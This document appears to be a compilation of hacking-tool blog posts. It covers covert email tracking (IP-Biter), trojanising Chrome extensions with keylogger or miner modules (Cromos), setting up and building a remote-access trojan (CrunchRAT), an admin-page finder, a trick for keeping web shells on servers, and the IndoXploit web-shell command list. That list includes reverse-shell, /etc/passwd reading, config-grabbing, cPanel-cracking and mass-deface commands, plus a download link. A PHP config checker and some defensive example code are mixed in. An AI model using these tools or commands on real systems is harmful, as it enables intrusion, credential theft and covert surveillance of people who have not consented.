IP-Biter is an open source, easy to deploy tracking framework that generates highly configurable, unique tracking images and links to embed in e-mails, sites or chat systems, and displays, in a hacker-friendly dashboard, highly detailed reports on the tracked users who view the image or open the links.

Features
  • Highly configurable tracking image generation
  • Tracking links generation
  • Tracking is hidden and not recognizable from the target's point of view
  • Integrated Dashboard
  • Self-tracking prevention
  • Possibility to stop and start the tracking at any time
  • Possibility to hide the Dashboard and protect its access with a password
  • Live tracking reports from the Dashboard
  • Tracking reports live delivered to a configurable mail address
  • Different IP analysis services
  • User-Agent analysis service
  • Integrated URL shortening service
  • AllInOne PHP file
  • No need for a Database
  • Open Source
...and many many more!
Give it a try!

Getting Started

Access the Dashboard
  1. Access the dashboard through ipb.php?op=$dashboardPage (or through ipb.php if $dashboardPage=='')
    • If $dashboardPageSecret!='' then a login page will appear asking for the $dashboardPageSecret value

Create a new configuration
  1. When the dashboard is opened without parameters, a new configuration is created
    • Another empty new configuration can be generated by clicking the "New" button
  2. Configure the tracking image and the advanced settings if needed
    • It is possible to leave the original image URL empty. In this case an empty image will be used.
  3. Add tracking links if needed
    • It is possible to leave the original link empty. In this case the link will generate a 404 page.
  4. Save the configuration
  5. Distribute the generated image or the links to start the tracking
    • You can click the copy button and paste into an HTML rich-text e-mail editor such as Gmail
    • NOTE: If you open the generated image or links while the dashboard page is open and loaded in the same browser, your request will not be tracked (self-tracking prevention feature)

Load an existing configuration
  1. When the dashboard is opened with the parameter "uuid", the associated configuration is loaded
    • Another configuration can be loaded by pasting the "Track UUID" into the corresponding dashboard field and clicking the "Load" button
  2. The reports will be automatically visualized in the "Tracking Reports" section of the dashboard

Security Notes
  • Change the folder names and the dashboard page in the configuration section to improve security
  • Add the following lines to the .htaccess file to deny access to the "configs" and "reports" folders:
DirectoryIndex ipb.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^(configs/|reports/) - [F]
</IfModule>

Live DEMO
Have a look at the DEMO (notifications limited at 50 mail/day and 1h/day downtime expected)


IP-Biter - The Hacker-friendly E-Mail Tracking Framework


Cromos is a tool for downloading legitimate extensions from the Chrome Web Store and injecting code into the background of the extension. Cromos can also create executable files to force installation (via PowerShell, for example) and upload files to Dropbox to host the malicious files.
  • Download extension
  • Injections
  • Upload files on dropbox
  • Windows infection

Group Policy Object (GPO)
Chrome allows you to add extensions using Windows Group Policy Object (GPO). If you need to force installation on multiple machines, follow the steps in the Chrome Deployment Guide and then modify the original extension. With a few modifications you can publish your extension in the Chrome Web Store, which requires paying $5.

Support
If you choose to generate a batch file to force installation, the PowerShell script that will be downloaded is compatible with Windows 7, 8 and 10 with PowerShell versions >= 3.0.

Demo
This is a demonstration of the tool at work. In this example I'm downloading a famous Google extension called G Suite Training from the Chrome Web Store and injecting a keylogger module.

Installation
$ cd $HOME/
$ git clone https://github.com/fbctf/cromos
$ sudo chmod -R 777 cromos/
$ cd cromos && python setup.py

Usage

Downloading the extension
Usage: python cromos.py --extension {id}

Downloading the extension and loading module
Usage: python cromos.py --extension {id} --load {currency/keylogger}

Build a batch file and upload the files in dropbox
Usage: python cromos.py --extension {id} --build {bat} --token {dropboxToken}

Modules
You can also inject some predefined modules in the background, such as a keylogger or a virtual-currency miner.
Module / Description
  • modules/keylogger: This module captures all the passwords you type in an infected browser, over HTTPS or not. All you need is a server (PHP, for example) to receive the GET requests; the parameters are email, password, cookies and userAgent.
  • modules/currency: This module allows you to mine virtual coins using the Coinhive API; you just need to have an account.


Cromos - Download and Inject code into Google Chrome extensions


Check current PHP configuration for potential security flaws.
Simply access this file from your webserver or run on CLI.

Author
This software was written by Ben Fuhrmannek, SektionEins GmbH, in an effort to automate php.ini checks and spend more time on cheerful tasks.

Idea
  • one single file for easy distribution
  • simple tests for each security related ini entry
  • a few other tests - not too complicated though
  • compatible with PHP >= 5.4, or if possible >= 5.0
  • NO complicated/overengineered code, e.g. no classes/interfaces, test-frameworks, libraries, ... -> It is supposed to be obvious on first glance - even for novices - how this tool works and what it does!
  • NO (or very few) dependencies

Usage / Installation
  • CLI: Simply call php phpconfigcheck.php. That's it. Add -a to see hidden results as well, -h for HTML output and -j for JSON output.
  • WEB: Copy this script to any directory accessible by your webserver, e.g. your document root. See also 'Safeguards' below.
    The output in non-CLI mode is HTML by default. This behaviour can be changed by setting the environment variable PCC_OUTPUT_TYPE=text or PCC_OUTPUT_TYPE=json.
    Some test cases are hidden by default, specifically skipped, ok and unknown/untested. To show all results, use phpconfigcheck.php?showall=1. This does not apply to JSON output, which returns all results by default.
    To control the output format in WEB mode use phpconfigcheck.php?format=..., where the value of format may be one of text, html or json. For example: phpconfigcheck.php?format=text. The format parameter takes precedence over PCC_OUTPUT_TYPE.

Safeguards
Most of the time it is a good idea to keep security related issues such as your PHP configuration to yourself. The following safeguards have been implemented:
  • mtime check: This script stops working in non-CLI mode after two days. Re-arming the check can be done by touch phpconfigcheck.php or by copying the script to your server again (e.g. via SCP). This check can be disabled by setting the environment variable: PCC_DISABLE_MTIME=1, e.g. SetEnv PCC_DISABLE_MTIME 1 in apache's .htaccess.
  • source IP check: By default only localhost (127.0.0.1 and ::1) can access this script. Other hosts may be added by setting PCC_ALLOW_IP to your IP address or a wildcard pattern, e.g. SetEnv PCC_ALLOW_IP 10.0.0.* in .htaccess. You may also choose to access your webserver via SSH port forwarding, e.g. ssh -D or ssh -L.
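
The two safeguards above can be modelled as a single gate. This is an added example in Python, not code from pcc itself (which is PHP); the function name, the constructed test requests and the shell-style glob reading of the PCC_ALLOW_IP wildcard are assumptions.

```python
import fnmatch
import time

TWO_DAYS = 2 * 24 * 60 * 60        # lifetime stated for the mtime check
LOCALHOST = ("127.0.0.1", "::1")   # sources allowed by default


def web_access_allowed(remote_addr, script_mtime, env, now=None):
    """Model both safeguards for a non-CLI request; returns (allowed, reason)."""
    now = time.time() if now is None else now
    # Safeguard 1: refuse once the script file is older than two days,
    # unless the operator explicitly disabled the check.
    if env.get("PCC_DISABLE_MTIME") != "1" and now - script_mtime > TWO_DAYS:
        return False, "mtime expired"
    # Safeguard 2: localhost always passes; anything else must match PCC_ALLOW_IP.
    if remote_addr in LOCALHOST:
        return True, "localhost"
    pattern = env.get("PCC_ALLOW_IP", "")
    # Assumption: the wildcard is a shell-style glob over the address string.
    if pattern and fnmatch.fnmatchcase(remote_addr, pattern):
        return True, "PCC_ALLOW_IP match"
    return False, "source IP not allowed"


if __name__ == "__main__":
    NOW = 1_700_000_000            # constructed clock value
    fresh, stale = NOW - 3600, NOW - 3 * 24 * 3600
    cases = [                      # constructed requests
        ("127.0.0.1", fresh, {}),
        ("10.0.0.7", fresh, {"PCC_ALLOW_IP": "10.0.0.*"}),
        ("10.0.1.7", fresh, {"PCC_ALLOW_IP": "10.0.0.*"}),
        ("10.0.0.150", fresh, {"PCC_ALLOW_IP": "10.0.0.1*"}),  # glob, not CIDR
        ("127.0.0.1", stale, {}),
        ("127.0.0.1", stale, {"PCC_DISABLE_MTIME": "1"}),
    ]
    for addr, mtime, env in cases:
        print(addr, env, web_access_allowed(addr, mtime, env, now=NOW))
```

Under glob semantics a pattern such as 10.0.0.1* also admits 10.0.0.150, so keep the pattern as narrow as the network layout allows.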

Troubleshooting
  • disabled functions: This script needs a few functions to work properly, such as ini_get() and stat(). If one of these functions is blacklisted (or not whitelisted) then execution will fail or produce invalid output. In these cases it is possible to temporarily put Suhosin in simulation mode and omit disable_functions. To be on the safe side, relaxed security configuration can be done with .htaccess in a separate directory. Also, this script may be called from the command line with your webserver's configuration, e.g. php -n -c /etc/.../php.ini phpconfigcheck.php.
  • CLI: Older PHP versions don't know about the SAPI name 'cli' and use CGI style output even on the CLI. Workaround: PCC_OUTPUT_TYPE=text /opt/php/php-5.1.6/bin/php phpconfigcheck.php

WARNING
This tool will only support you setting up a secure PHP environment. Nothing else. Your setup, software or any related configuration may still be vulnerable, even if this tool's output suggests otherwise.


pcc - PHP Secure Configuration Checker


CrunchRAT currently supports the following features:
  • File upload
  • File download
  • Command execution
It is currently single-threaded (only one task at a time), but multi-threading (or multi-tasking) is currently in the works. Additional features will be included at a later date.

Server
The server-side of the RAT uses PHP and MySQL. The server-side of the RAT has been tested and works on the following:
  • Ubuntu 15.10 (Desktop or Server edition)
  • Ubuntu 16.04 (Desktop or Server edition)
Once the latest RAT code has been downloaded, there will be three directories:
  • Client - Contains implant code (ignore for this section)
  • Server - Contains server code
  • Setup - Contains setup files

Dependencies Setup
  1. Within the Setup directory, there are two dependencies setup shell scripts. If you are using Ubuntu 15.10 run sh 15_10_dependencies.sh, and if you're using Ubuntu 16.04 run sh 16_04_dependencies.sh. Note: This needs to be run as root. Failure to run with root privileges will result in an error.
  2. When asked for a new MySQL root password, please choose one that is complex. This information is needed at a later step.

HTTPS Setup
  1. CrunchRAT uses a self-signed certificate to securely communicate between the server and implant. Run the https_setup.sh shell script within the Setup directory to automate the HTTPS setup. Note: This needs to be run as root. Failure to run with root privileges will result in an error. When asked to fill out the certificate information (Country Name, etc), please fill out all information. Snort rules already exist to alert on the dummy OpenSSL certificates. Don't be that guy that gets flagged by not filling out this information.
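
The Snort remark above refers to certificates created by accepting OpenSSL's prompts unchanged. As an added example (not part of CrunchRAT or of any Snort ruleset), the following Python check flags such certificates from the subject and issuer lines printed by openssl x509; the function names and the sample lines are constructed for illustration.

```python
import re

# Values OpenSSL's stock openssl.cnf offers when the prompts are left unchanged.
OPENSSL_DEFAULTS = {"C": "AU", "ST": "Some-State", "O": "Internet Widgits Pty Ltd"}


def parse_dn(dn):
    """Parse a DN printed as '/C=AU/ST=..' (old style) or 'C = AU, ST = ..'."""
    dn = re.sub(r"^(subject|issuer)\s*=\s*", "", dn.strip())
    if dn.startswith("/"):
        parts = dn.split("/")
    else:
        # Split only on commas that start a new 'KEY =' so 'Acme, Inc.' survives.
        parts = re.split(r",\s*(?=[A-Za-z.]+\s*=)", dn)
    fields = {}
    for part in parts:
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def assess(subject, issuer):
    """Report which default fields a certificate carries and whether to alert."""
    subj, iss = parse_dn(subject), parse_dn(issuer)
    defaults = sorted(k for k, v in OPENSSL_DEFAULTS.items() if subj.get(k) == v)
    return {
        "default_fields": defaults,
        "self_signed": bool(subj) and subj == iss,
        "missing_cn": "CN" not in subj,
        # C=AU alone is normal for Australian sites; the placeholder
        # organisation, or two defaults together, is the real signal.
        "alert": "O" in defaults or len(defaults) >= 2,
    }


# Constructed sample lines in the two formats openssl x509 -noout prints.
SAMPLES = [
    ("subject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd",
     "issuer=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd"),
    ("subject= /C=AU/ST=Some-State/O=Internet Widgits Pty Ltd",
     "issuer= /C=AU/ST=Some-State/O=Internet Widgits Pty Ltd"),
    ("subject=C = AU, ST = Victoria, O = Example Pty Ltd, CN = www.example.com.au",
     "issuer=C = US, O = Example CA, CN = Example Issuing CA"),
]

if __name__ == "__main__":
    for subject, issuer in SAMPLES:
        print(assess(subject, issuer))
```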

Database Setup
  1. Run the database_setup.sh shell script within the Setup directory to set up the MySQL database.
  2. CrunchRAT creates a default RAT account with the admin:changeme credentials. Please log into the web end of the RAT and change the default password. Once logged into the web end of the RAT, go to Account Management --> Change Password to successfully change the default password to something more complex. Additional RAT users can be provisioned using Account Management --> Add Users.

Miscellaneous Setup
  1. Copy all files from the Server directory to the webroot.
  2. You will want to create a downloads directory as well. Note: It is absolutely critical that you don't put this folder in the webroot. I typically create this directory in the /home/<USERNAME> directory. You will want to make sure that www-data can access this directory with the following command sudo chown www-data:www-data downloads. This directory will store all of the files downloaded from the infected system(s).
  3. In the webroot, open the config/config.php file. This is the main RAT configuration file. Make sure that you update all of the variables (downloadsPath, dbUser, dbPass, etc) to match your environment.

Client
CrunchRAT is written in C# for simplicity. The C# binary does not have a persistence mechanism in place, but plans to write a C++ stager are currently in the works.
Targeted Framework: .NET Framework 3.5 (enabled by default on Windows 7 systems)
  1. Create a new console project in Visual Studio
  2. Copy implant.cs code from Client directory and add it to the project.
  3. Change Output Type to Windows Application (this will hide the command window) (Project --> Properties --> Output Type).
  4. Make sure Target Framework is .NET Framework 3.5.
  5. In the actual code, there will be a variable called c2 - Change this variable to the IP address or domain name of the C2 server
  6. Compile and your implant executable is ready to run.


CrunchRAT - HTTPS-based Remote Administration Tool (RAT)


A script to find admin login pages and EAR (Execution After Redirect) vulnerabilities.

Features
  • Multi-threading on demand
  • Big path list (798 paths)
  • Supports php, asp and html extensions
  • Checks for potential EAR vulnerabilities
  • Checks for robots.txt
  • Support for custom paths

Usages
  • Check all paths with php extension
python breacher -u example.com --type php
  • Check all paths with php extension with threads
python breacher -u example.com --type php --fast
  • Check all paths without threads
python breacher -u example.com
  • Adding a custom path
python breacher -u example.com --path /data

Note: When you specify an extension using --type option, Breacher includes paths of that extension as well as paths with no extensions like /admin/login


Breacher - Tool To Find Admin Login Pages And EAR Vulnerabilities

Xampp

This time I want to explain a little about XAMPP :'v Since I have no ideas for writing a tutorial, I'll just post this instead :'v it still adds a bit of knowledge.
A short explanation of XAMPP
XAMPP is a package that bundles three applications into one, namely Apache, MySQL and PHPMyAdmin. With XAMPP your work is made much easier because you can install and configure all three applications at once and automatically.
XAMPP can also serve as a localhost :'v for testing shells or new exploits with the .php extension :'v

Interested? You can download it below :'v

Download, bro


Xampp: a Localhost Application for Linux or Windows

OK, this time I want to share a little trick: how to bypass a server that is 'annoying' when you upload large shells such as (indoxploit shell, wso, b374k, c99, etc.). Yep, Not Acceptable.

It is easy to work around.
Write a backdoor file into the /tmp directory, then call that shell from its current directory with the PHP function 'include()'.
Further explanation.

Here, I have made a special backdoor to make it easier to call any other backdoor we want.

Change the $URL part; fill it in with the URL of the shell backdoor you want.

Then just open the backdoor file.
If the TMP Shell backdoor keeps redirecting and produces a blank page, that means the called backdoor file was not successfully written to the /tmp directory.
OK, that's all for now.
Hope it's useful.

Bypass 406 & Server Auto-Deletion of Shells with TMP Shell by IndoXploit

Hello, good evening.
This time we are sharing the indoxploit shell backdoor again. This time we have added several new features that were not in indoxploit shell before, along with some changes to the shell's appearance and other things. OK, let's get straight to it.

IndoXploit Shell V.3 is 'Command Based'; in other words, to run some of its tools/features you have to enter a specific command.

Example command to call the 'Adminer' tool


Login Shell, default password: IndoXploit

 [ List Tools - IndoXploit Shell Backdoor V.3 ]

=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd

 - Spawn File/Tools
 usage: spawn [name]

 [name]
 - Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)

 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1

 - Jumping
 usage: jumping

 - Config Grabber
 usage: idxconfig

 - Symlink
 usage: symlink

 - Reverse Shell
 [Back Connect]
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl

 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 perl

 - KRDP - Create RDP Account (for windows server only)
 usage: krdp

 - Logout From Shell
 usage: logout

 - Kill Backdoor
 usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit



#Link Download: 
http://server.indoxploit.or.id/indoxploit_v3.txt

###############################################################################
Thanks to the people who helped in the process of making this shell.
This shell is not 100% hand-coded; there are some functions and tools that we took from existing shells.

But the rest is IndoXploit's own creation.
Without you we would not be as BIG as we are now.

Greetz: 
All Member IndoXploit. & All My Friends.
###############################################################################
Special Thanks: 
Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################

IndoXploit Shell First Edition [ V.3 ]